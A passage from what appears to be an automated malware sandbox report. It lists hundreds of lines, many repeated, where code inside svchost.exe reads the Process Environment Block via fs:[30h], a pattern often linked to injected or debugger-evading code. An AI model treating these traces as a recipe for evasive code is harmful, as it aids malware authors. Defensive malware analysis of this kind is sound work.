                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
